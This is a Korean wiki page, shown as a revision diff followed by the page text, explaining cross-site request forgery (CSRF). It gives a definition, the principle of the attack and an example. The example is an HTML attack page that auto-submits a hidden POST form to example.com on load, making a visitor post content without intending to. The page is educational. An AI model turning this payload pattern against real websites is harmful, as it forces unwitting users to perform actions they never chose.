(→같이 보기) |
(→같이 보기) |
||
| 31번째 줄: | 31번째 줄: | ||
==같이 보기== | ==같이 보기== | ||
{{z컬럼3| | {{z컬럼3| | ||
* [[OWASP]] | * [[OWASP]] | ||
* [[동일 오리진 정책]] | * [[동일 오리진 정책]] | ||
* [[클라이언트 사이드]] | |||
* [[웹 애플리케이션 보안]] | * [[웹 애플리케이션 보안]] | ||
* [[자바스크립트 onload]] | * [[자바스크립트 onload]] | ||
* [[크로스 사이트 스크립팅]] (XSS) | * [[서버 사이드 요청 위조]](SSRF) | ||
* [[크로스 사이트 스크립팅]](XSS) | |||
* [[라라벨 CSRF 방지]] | * [[라라벨 CSRF 방지]] | ||
}} | }} | ||
2025년 12월 23일 (화) 22:28 판
1 개요
- cross-site request forgery (CSRF), (XSRF), one-click attack, session riding
- 사이트 간 요청 위조, 크로스 사이트 요청 위조
- 의도하지 않게 게시판에 글을 작성하거나, 쇼핑을 하게 하는 등의 공격
- 인증된 사용자로 하여금 공격자가 원하는 명령을 대신 수행하게 하는 공격
- 사용자가 자신의 의지와는 무관하게 공격자가 의도한 행위(수정, 삭제, 등록 등)를 특정 웹사이트에 요청하게 하는 공격
- XSS에 취약하면 공격이 용이함
2 원리
- 공격자가 공격용 웹페이지를 작성하여 공개한다.
- 제3자가 웹페이지에 접속하면, 제3자는 임의의 HTTP요청(공격)을 송신하게 된다.
3 예시
<!DOCTYPE html>
<html lang="ko">
<head>
<title>공격용 웹페이지</title>
</head>
<body onload="document.attackform.submit();">
<form name="attackform" method="post" action="http://example.com/bbs/register.cgi">
<input type="hidden" name="title" value="제목">
<input type="hidden" name="article" value="본문">
<input type="submit" value="제출">
</form>
</body>
</html>
- → 웹페이지가 로드되면(onload) 의도하지 않게 example.com에 글을 남기도록 폼 내용을 제출하게 됨
4 같이 보기
5 참고
로그인하시면 댓글을 쓸 수 있습니다.
{{ comment.name }}
{{ comment.created | snstime }}
-
{{comment.page_title}} ―{{comment.name}}